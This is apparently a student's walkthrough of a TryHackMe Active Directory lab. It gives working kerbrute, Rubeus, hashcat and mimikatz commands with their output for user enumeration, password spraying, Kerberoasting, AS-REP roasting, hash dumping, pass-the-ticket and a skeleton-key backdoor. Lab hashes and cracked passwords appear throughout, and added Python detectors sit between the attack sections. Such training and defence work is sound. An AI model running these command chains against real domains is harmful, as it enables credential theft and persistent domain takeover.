THM Attacking Kerberos done
Attacking_Kerberos
Task 1 Introduction
What does TGT stand for?
Ticket Granting Ticket
What does SPN stand for?
Service Principal Name
What does PAC stand for?
Privilege Attribute Certificate
What two services make up the KDC?
AS, TGS
Deploy the Machine
No answer needed
Task 2 Enumeration w/ Kerbrute
Add the IP address to /etc/hosts
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# echo "10.10.228.63 CONTROLLER.local" >> /etc/hosts
┌──(root㉿kali)-[~]
└─# cat /etc/hosts | grep CONTROLLER
10.10.228.63 CONTROLLER.local
Enumerating Users w/ Kerbrute
Download users list
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
--2023-03-17 07:48:53-- https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 836 [text/plain]
Saving to: ‘User.txt’
User.txt 100%[==============================================>] 836 --.-KB/s in 0s
2023-03-17 07:48:53 (31.7 MB/s) - ‘User.txt’ saved [836/836]
Download kerbrute
┌──(kali㉿kali)-[/tmp]
└─$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
--2023-03-17 07:43:24-- https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Enumerate
┌──(kali㉿kali)-[/tmp]
└─$ ./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos/User.txt
Version: v1.0.3 (9dad6e1) - 03/17/23 - Ronnie Flathers @ropnop
2023/03/17 07:49:36 > Using KDC(s):
2023/03/17 07:49:36 > CONTROLLER.local:88
2023/03/17 07:49:36 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:36 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:36 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > Done! Tested 100 usernames (10 valid) in 0.587 seconds
How many total users do we enumerate?
10
What is the SQL service account name?
sqlservice
What is the second "machine" account name?
machine2
What is the third "user" account name?
user3
Task 3 Harvesting & Brute-Forcing Tickets w/ Rubeus
Log in to the host via SSH
Username: Administrator
Password: P@$$W0rd
Domain: controller.local
┌──(kali㉿kali)-[/tmp]
└─$ ssh Administrator@10.10.228.63
The authenticity of host '10.10.228.63 (10.10.228.63)' can't be established.
ED25519 key fingerprint is SHA256:MJ0mfCQOQV99jJLs4F9riigTRyr0ECpBPVSQrP0jz80.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.228.63' (ED25519) to the list of known hosts.
Administrator@10.10.228.63's password:
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
controller\administrator@CONTROLLER-1 C:\Users\Administrator>
Harvesting Tickets w/ Rubeus
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe harvest /interval:30
v1.5.0
[*] Action: TGT Harvesting (with auto-renewal)
[*] Monitoring every 30 seconds for new TGTs
[*] Displaying the working TGT cache every 30 seconds
[*] Refreshing TGT ticket cache (3/17/2023 5:26:24 AM)
User : [email protected]
StartTime : 3/17/2023 3:22:41 AM
EndTime : 3/17/2023 1:22:41 PM
RenewTill : 3/24/2023 3:22:41 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
cmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQoMIIEJKADAgESoQMCAQKiggQWBIIEEs3FimZh8ybbq1+nywi2mgF607M/sLplFTWY
...
Add IP to C:\Windows\System32\drivers\etc\hosts
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>echo 10.10.228.63 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
Brute-Forcing / Password-Spraying w/ Rubeus
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe brute /password:Password1 /noticket
v1.5.0
[-] Blocked/Disabled user => Guest
[-] Blocked/Disabled user => krbtgt
[+] STUPENDOUS => Machine1:Password1
[*] base64(Machine1.kirbi):
...
[+] Done
Which domain admin do we get a ticket for when harvesting tickets?
Administrator
Which domain controller do we get a ticket for when harvesting tickets?
CONTROLLER-1
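As an added defender-side example (not part of the room, kerbrute or Rubeus), the Python below shows what the enumeration in Task 2 and the password spray above leave in the domain controller's Security log: one client address touching many distinct principals within seconds. Kerbrute userenum shows up as event 4768 failures with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for names that do not exist, and the Rubeus brute run as event 4771 failures with Failure Code 0x18 (KDC_ERR_PREAUTH_FAILED) for wrong guesses. The event records and most account names are constructed; the same sliding-window count covers both cases.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# (event id, result/failure code) -> what a burst of them means
SIGNATURES = {("4768", "0x6"): "username enumeration",    # KDC_ERR_C_PRINCIPAL_UNKNOWN
              ("4771", "0x18"): "password spraying"}       # KDC_ERR_PREAUTH_FAILED
WINDOW = timedelta(seconds=60)
THRESHOLD = 8            # distinct principals from one client inside WINDOW

def parse_event(line):
    """Parse one constructed 'key=value ...' record; 'time' becomes a datetime."""
    ev = dict(part.split("=", 1) for part in line.split())
    ev["time"] = datetime.fromisoformat(ev["time"])
    return ev

def build_sample_events():
    """Constructed DC records: a kerbrute-style burst, a Rubeus-style spray, and noise."""
    base = datetime(2023, 3, 17, 7, 49, 36)
    lines = []
    for i in range(100):                            # 100 names tested in ~0.6 s
        code = "0x0" if i % 10 == 0 else "0x6"      # 10 exist, 90 do not
        t = base + timedelta(milliseconds=6 * i)
        lines.append(f"time={t.isoformat()} id=4768 user=name{i} ip=10.9.1.50 code={code}")
    valid = ["Administrator", "Admin1", "Admin2", "User1", "User2", "User3",
             "SQLService", "HTTPService", "Machine1", "Machine2", "Guest", "krbtgt"]
    spray = base + timedelta(hours=1)               # one password tried on every account
    for i, user in enumerate(valid):
        t = spray + timedelta(milliseconds=50 * i)
        if user in ("Guest", "krbtgt"):             # disabled: 4768 with 0x12, not counted
            eid, code = "4768", "0x12"
        elif user == "Machine1":                    # the one account the guess fits
            eid, code = "4768", "0x0"
        else:
            eid, code = "4771", "0x18"
        lines.append(f"time={t.isoformat()} id={eid} user={user} ip=10.9.1.50 code={code}")
    for i, user in enumerate(["jsmith", "jsmith", "jsmiht"]):   # one person mistyping
        t = base + timedelta(minutes=3 * i)
        lines.append(f"time={t.isoformat()} id=4771 user={user} ip=10.9.2.7 code=0x18")
    return lines

def detect(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {(client ip, label): peak distinct principals inside any window}
    for every client/signature pair that reached the threshold."""
    buckets = defaultdict(list)
    for ev in map(parse_event, lines):
        label = SIGNATURES.get((ev["id"], ev["code"]))
        if label:
            buckets[(ev["ip"], label)].append((ev["time"], ev["user"].lower()))
    alerts = {}
    for key, hits in buckets.items():
        hits.sort()
        recent, counts, peak = deque(), defaultdict(int), 0
        for t, user in hits:
            recent.append((t, user))
            counts[user] += 1
            while t - recent[0][0] > window:        # drop events that fell out of the window
                _, old = recent.popleft()
                counts[old] -= 1
                if not counts[old]:
                    del counts[old]
            peak = max(peak, len(counts))
        if peak >= threshold:
            alerts[key] = peak
    return alerts
```

The mistyping user from 10.9.2.7 never reaches the threshold, while both bursts from 10.9.1.50 do; on a real DC the same fields come from the 4768/4771 events with Kerberos auditing enabled.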
Task 4 Kerberoasting w/ Rubeus & Impacket
Method 1 - Rubeus
Dump the Kerberos hash
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe kerberoast
v1.5.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 2
[*] SamAccountName : SQLService
[*] DistinguishedName : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet : 5/25/2020 10:28:26 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca
...
[*] SamAccountName : HTTPService
[*] DistinguishedName : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/HTTPService.CONTROLLER.local:30222
[*] PwdLastSet : 5/25/2020 10:39:17 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo
...
Download custom password list
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt
--2023-03-17 08:50:03-- https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9706 (9.5K) [text/plain]
Saving to: ‘Pass.txt’
Pass.txt 100%[==============================================>] 9.48K --.-KB/s in 0.02s
2023-03-17 08:50:04 (555 KB/s) - ‘Pass.txt’ saved [9706/9706]
Cracking hash
Copy and prepare hash
Copy and paste the hash to the local VM, then strip the spaces and line breaks the console output inserted
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ cat HTTPService_hash.txt | tr -d " " | tr -d "\n" > HTTPService_hash_clear.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ cat SQLService_hash.txt | tr -d " " | tr -d "\n" > SQLService_hash_clear.txt
Cracking hash
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 13100 -a 0 HTTPService_hash_clear.txt Pass.txt --show
$krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.local:30222*$c9bcd76deffc6352ce1126ecdd35088f$f4bd0187327e9662871438c202a7aa67745a42dea2c7702d99ced898abef2f81f0b98862e7b56cb86c7095e5f0d18ffdb4f69f434c0f17
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 13100 -a 0 SQLService_hash_clear.txt Pass.txt --show
$krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.local:30111*$fd1e802ca0633199c38c758ab15c7f5a$64169c86d00e48678b395f76c7b872fd1f7d1fb512e4d7bfd8428f0a84b9f3921b909d95b099f543c404923e6da1cf5b61d8f9ef90b22e84
What is the HTTPService Password?
Summer2020
What is the SQLService Password?
MYPassword123#
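Added example, not the room's or Rubeus' code: the defender's side of the Kerberoast above. Each service ticket Rubeus requested is an event 4769 on the DC, and the output above shows it obtained RC4_HMAC (etype 0x17) tickets for SQLService and HTTPService; one requester collecting RC4 service tickets for several user service accounts (SPN owners without a trailing `$`) within minutes is the signal. The `roasted_account` helper parses the `$krb5tgs$23$` header format printed above so a found hash file can be mapped back to the accounts that need a password reset. Event records and the hash tail are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                 # Ticket Encryption Type in event 4769
WINDOW = timedelta(minutes=5)
MIN_SERVICES = 2                  # distinct user SPN accounts per requester

# Constructed 4769 records: time | requesting account | service name | etype | client address
SAMPLE_4769 = [
    "2023-03-17T08:12:01|Administrator@CONTROLLER.LOCAL|SQLService|0x17|10.10.228.63",
    "2023-03-17T08:12:01|Administrator@CONTROLLER.LOCAL|HTTPService|0x17|10.10.228.63",
    "2023-03-17T08:12:02|Administrator@CONTROLLER.LOCAL|CONTROLLER-1$|0x12|10.10.228.63",
    "2023-03-17T08:30:45|User1@CONTROLLER.LOCAL|HTTPService|0x12|10.10.228.70",
    "2023-03-17T09:01:10|Machine2$@CONTROLLER.LOCAL|CONTROLLER-1$|0x12|10.10.228.80",
]

# Header as Rubeus printed it for SQLService; checksum and ciphertext replaced by placeholders
SAMPLE_HASH = ("$krb5tgs$23$*SQLService$CONTROLLER.local$"
               "CONTROLLER-1/SQLService.CONTROLLER.local:30111*$<checksum>$<edata>")

def parse_4769(line):
    t, requester, service, etype, addr = line.split("|")
    return {"time": datetime.fromisoformat(t), "requester": requester,
            "service": service, "etype": etype, "addr": addr}

def is_user_service(service):
    """Machine accounts end in '$' and krbtgt is the TGT service; neither is a
    Kerberoast target, so only the remaining SPN owners count."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def detect_kerberoast(lines, window=WINDOW, min_services=MIN_SERVICES):
    """Return {requester: sorted services} for requesters that obtained RC4
    service tickets for at least min_services distinct user accounts within window."""
    per_requester = defaultdict(list)
    for ev in map(parse_4769, lines):
        if ev["etype"] == RC4_HMAC and is_user_service(ev["service"]):
            per_requester[ev["requester"]].append((ev["time"], ev["service"]))
    alerts = {}
    for requester, hits in per_requester.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            in_window = {s for t, s in hits[i:] if t - t0 <= window}
            if len(in_window) >= min_services:
                alerts[requester] = sorted(in_window)
                break
    return alerts

def roasted_account(hash_line):
    """Triage helper for a '$krb5tgs$<etype>$*user$realm$spn*$...' line:
    returns (etype, account, realm, spn) so the exposed account can be reset."""
    head = hash_line.partition("*$")[0]            # '$krb5tgs$23$*user$realm$spn'
    tag, _, inner = head.partition("$*")           # tag='$krb5tgs$23', inner='user$realm$spn'
    account, realm, spn = inner.split("$", 2)
    return tag.split("$")[2], account, realm, spn
```

The durable fix is on the accounts themselves: long random passwords or group Managed Service Accounts for SPN owners, and AES-only msDS-SupportedEncryptionTypes so the "RC4_HMAC_DEFAULT" seen above no longer applies.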
Task 5 AS-REP Roasting w/ Rubeus
Dumping KRBASREP5 Hashes w/ Rubeus
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe asreproast
v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain : CONTROLLER.local
[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName : Admin2
[*] DistinguishedName : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::7c5c:25d1:d138:eadb%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
[email protected]:0BEAE08D21742BC46F7A247BFEA24466$04C25D71EAF5
...
[*] SamAccountName : User3
[*] DistinguishedName : CN=User-3,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::7c5c:25d1:d138:eadb%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\User3'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
[email protected]:E74847ACB8ACCEC38A5354383EA90A41$0F22855518A16
...
Crack those Hashes w/ hashcat
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 18200 Admin-2.hash_clear.txt Pass.txt
...
[email protected]:0beae08d21742bc46f7a247bfea24466$04c25d71eaf5e0783aa2b551cc94607e9dab65df451f29cab4aa0e9f736c67d0e7d4432d93edf5c324cc7959182659bf23e9f1e08ee0798051df438c10e1841b4ae2c8cbdb189d72b69c2d435724a824e04ad5f3b15d5af393f8e158305106281e2723b7a2a48a0476e57730fd8e0ffe3b7391101e94daea282c148625a348ad42df28cda58a72f4796ae05d24323e576761dcce141aff57ed29790e484b22a2f9615c66dcc4a6807304d309a40ee59da224d656dbbfacb8a61ebbbf4ca0043ce779399c3cd34e1a1749b568eceb657f03e5337cf886722aa94140c60f7539137eca3c35da701e9b48dffa01e8008e3d96fc0912:P@$$W0rd2
...
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 18200 User-3.hash_clear.txt Pass.txt
...
[email protected]:e74847acb8accec38a5354383ea90a41$0f22855518a1666eb7d59fe4daf8d052c509125f0809103c71bf6e27410306fd311d030b0afdce8fc2043bdbe45bc3e5f38512abaf509ad70293310c4d561c6eec90fc5aefefcc40dc0a47f0ff38e4f9709ef83522a366daf7d23e01ca75839e02316b4bef0536a5a62dfb65f105b8eee0f63f7e6e9c414211e1decb75087435fae8bb05f85471344df94753013b2f34cf5f8c0cd8693fcae5ca46de31bf27338f25cef892a1ae48e935ff20df65b123ed2b9ed9c36dc71919787e9d910841ec156f0f403a084f3ec604d8b984fb437a952516209441d70bb898a537e07184f0ae40e36356502fa8bfe948f2faf6a811411b74b4:Password3
...
What hash type does AS-REP Roasting use?
Kerberos 5, etype 23, AS-REP
Which User is vulnerable to AS-REP Roasting?
User3
What is the User's Password?
Password3
Which Admin is vulnerable to AS-REP Roasting?
Admin2
What is the Admin's Password?
P@$$W0rd2
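Added example (not from the room or Rubeus) covering the audit and the detection side of the AS-REP roast above. Admin2 and User3 were roastable because the DONT_REQ_PREAUTH bit (0x400000) is set in their userAccountControl, so the KDC answered an AS-REQ that carried no pre-authentication; on the DC that is an event 4768 with Pre-Authentication Type 0, and the `$krb5asrep$23$` hashes above correspond to RC4 (0x17) tickets. The account table and event records are constructed to mirror the room's accounts.

```python
from collections import defaultdict

DONT_REQ_PREAUTH = 0x400000   # userAccountControl flag UF_DONT_REQUIRE_PREAUTH
NORMAL_ACCOUNT = 0x200
DONT_EXPIRE_PASSWORD = 0x10000
RC4_HMAC = "0x17"

# Constructed: sAMAccountName -> userAccountControl
SAMPLE_ACCOUNTS = {
    "Admin2": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
    "User3": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
    "User1": NORMAL_ACCOUNT,
    "SQLService": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
}

# Constructed 4768 records: time | account | pre-auth type | ticket etype | result | client
SAMPLE_4768 = [
    "2023-03-17T09:02:11|Admin2|0|0x17|0x0|10.10.228.63",   # no pre-auth, RC4: roast
    "2023-03-17T09:02:11|User3|0|0x17|0x0|10.10.228.63",    # same client, second account
    "2023-03-17T09:05:40|User1|2|0x12|0x0|10.10.228.70",    # PA-ENC-TIMESTAMP + AES: normal
    "2023-03-17T09:06:02|Admin2|0|0x12|0x0|10.10.228.90",   # no pre-auth but AES, one account
]

def asrep_roastable(accounts):
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set (sorted names)."""
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)

def remediated_uac(uac):
    """The userAccountControl value after clearing the bit (what the fix writes back)."""
    return uac & ~DONT_REQ_PREAUTH

def detect_asrep_roast(lines, min_accounts=2):
    """Group TGTs issued with Pre-Authentication Type 0 and an RC4 ticket by client.
    A single such event can be a legacy client of a no-preauth account; one client
    collecting them for several distinct accounts is the Rubeus pattern above.
    Returns {client: sorted accounts} for clients at or above min_accounts."""
    per_client = defaultdict(set)
    for line in lines:
        _, account, pa_type, etype, result, client = line.split("|")
        if pa_type == "0" and etype == RC4_HMAC and result == "0x0":
            per_client[client].add(account)
    return {c: sorted(a) for c, a in per_client.items() if len(a) >= min_accounts}
```

In a live domain the `SAMPLE_ACCOUNTS` table is what an LDAP query for `userAccountControl` returns; clearing the bit on every hit removes the exposure, since the KDC then demands pre-authentication before sending anything encrypted with the user's key.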
Task 6 Pass the Ticket w/ mimikatz
Prepare Mimikatz & Dump Tickets
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 409275 (00000000:00063ebb)
Session : Network from 0
User Name : CONTROLLER-1$
Domain : CONTROLLER
Logon Server : (null)
Logon Time : 3/17/2023 6:39:04 AM
SID : S-1-5-18
* Username : CONTROLLER-1$
* Domain : CONTROLLER.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 3/17/2023 6:34:22 AM ; 3/17/2023 4:34:22 PM ;
List dumped tickets
Pass the Ticket w/ Mimikatz
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
mimikatz # kerberos::ptt [0;49729][email protected]
* File: '[0;49729][email protected]': OK
Read cached tickets
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>klist
Current LogonId is 0:0x49729
Cached Tickets: (1)
#0> Client: Administrator @ CONTROLLER.LOCAL
Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 3/17/2023 6:37:00 (local)
End Time: 3/17/2023 16:37:00 (local)
Renew Time: 3/24/2023 6:37:00 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Verify that I can read admin$
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>dir \\localhost\admin$
Volume in drive \\localhost\admin$ has no label.
Volume Serial Number is E203-08FF
Directory of \\localhost\admin$
01/03/2021 08:36 AM <DIR> .
01/03/2021 08:36 AM <DIR> ..
09/15/2018 12:19 AM <DIR> ADFS
05/25/2020 02:58 PM <DIR> ADWS
09/15/2018 12:19 AM <DIR> appcompat
09/06/2019 05:31 PM <DIR> apppatch
05/25/2020 02:55 PM <DIR> AppReadiness
05/25/2020 03:41 PM <DIR> assembly
09/15/2018 12:19 AM <DIR> bcastdvr
09/15/2018 12:12 AM 78,848 bfsvc.exe
09/15/2018 12:19 AM <DIR> Boot
I understand how a pass the ticket attack works
No answer needed
Task 7 Golden/Silver Ticket Attacks w/ mimikatz
Dump the krbtgt hash (lsadump::lsa, run here against SQLService)
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:SQLService
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860
RID : 00000455 (1109)
User : SQLService
* Primary
NTLM : cd40c9ed96265531b21fc5b1dafcfb0a
LM :
Hash NTLM: cd40c9ed96265531b21fc5b1dafcfb0a
ntlm- 0: cd40c9ed96265531b21fc5b1dafcfb0a
lm - 0: 7bb53f77cde2f49c17190f7a071bd3a0
...
Dump the krbtgt hash (lsadump::lsa, run here against Administrator)
mimikatz # lsadump::lsa /inject /name:Administrator
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860
RID : 000001f4 (500)
User : Administrator
* Primary
NTLM : 2777b7fec870e04dda00cd7260f7bee6
LM :
Hash NTLM: 2777b7fec870e04dda00cd7260f7bee6
* Kerberos
Default Salt : WIN-G83IJFV2N03Administrator
...
What is the SQLService NTLM Hash?
cd40c9ed96265531b21fc5b1dafcfb0a
What is the Administrator NTLM Hash?
2777b7fec870e04dda00cd7260f7bee6
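Added example, not part of the room or mimikatz: what a forged TGT looks like from the defender's side. The genuine ticket read with klist in Task 6 is AES-256 encrypted and lives ten hours (6:37 to 16:37), whereas a golden ticket built with mimikatz from the krbtgt NTLM hash dumped above is RC4 encrypted and, with mimikatz's defaults, valid for ten years. Both properties appear in klist output, so the parser below checks every krbtgt ticket against the domain's maximum ticket lifetime and encryption policy. The first ticket in the sample reproduces the page's klist output; the second is constructed to look like such a forgery.

```python
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)     # domain default "Maximum lifetime for user ticket"
WEAK_ETYPES = {"RC4-HMAC-NT", "RC4-HMAC", "DES-CBC-MD5", "DES-CBC-CRC"}

KLIST_OUTPUT = """\
Current LogonId is 0:0x49729

Cached Tickets: (2)

#0>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 3/17/2023 6:37:00 (local)
        End Time:   3/17/2023 16:37:00 (local)
        Renew Time: 3/24/2023 6:37:00 (local)

#1>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: RC4-HMAC-NT
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/17/2023 6:40:00 (local)
        End Time:   3/17/2033 6:40:00 (local)
        Renew Time: 3/17/2033 6:40:00 (local)
"""

def parse_klist(text):
    """Split klist output into one dict per '#N>' block, keyed by the 'Field:' labels."""
    tickets, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#") and ">" in line:
            current = {}
            tickets.append(current)
            line = line.split(">", 1)[1].strip()     # '#0>  Client: ...' -> 'Client: ...'
        if current is None or ":" not in line:
            continue                                 # header lines and 'Ticket Flags ... ->'
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return tickets

def _when(value):
    """'3/17/2023 6:37:00 (local)' -> datetime."""
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")

def suspicious_tgts(text, max_lifetime=MAX_TGT_LIFETIME):
    """Return [(ticket index, reasons)] for krbtgt tickets that outlive the
    policy or use a weak encryption type; an empty list means nothing stood out."""
    findings = []
    for i, t in enumerate(parse_klist(text)):
        if not t.get("Server", "").startswith("krbtgt/"):
            continue                                 # only TGTs are judged here
        reasons = []
        lifetime = _when(t["End Time"]) - _when(t["Start Time"])
        if lifetime > max_lifetime:
            reasons.append(f"lifetime {lifetime} exceeds policy {max_lifetime}")
        etype = t.get("KerbTicket Encryption Type", "")
        if etype in WEAK_ETYPES:
            reasons.append(f"weak encryption type {etype}")
        if reasons:
            findings.append((i, reasons))
    return findings
```

The same two checks apply to 4769 and 4624 event data on the DC; the structural fix for a krbtgt compromise is resetting the krbtgt password twice, which invalidates every ticket derived from the old hash.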
Task 8 Kerberos Backdoors w/ mimikatz
Installing the Skeleton Key - Mimikatz
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
mimikatz # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK
Accessing the forest
This is only a PoC; we can't do it on this machine.
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
dir \\Desktop-1\c$ /user:Machine1 mimikatz
I understand how to implant a skeleton key into a domain controller with mimikatz
No answer needed
Task 9 Conclusion
I Understand the Basics of Attacking Kerberos
No answer needed
References
https://github.com/GhostPack/Rubeus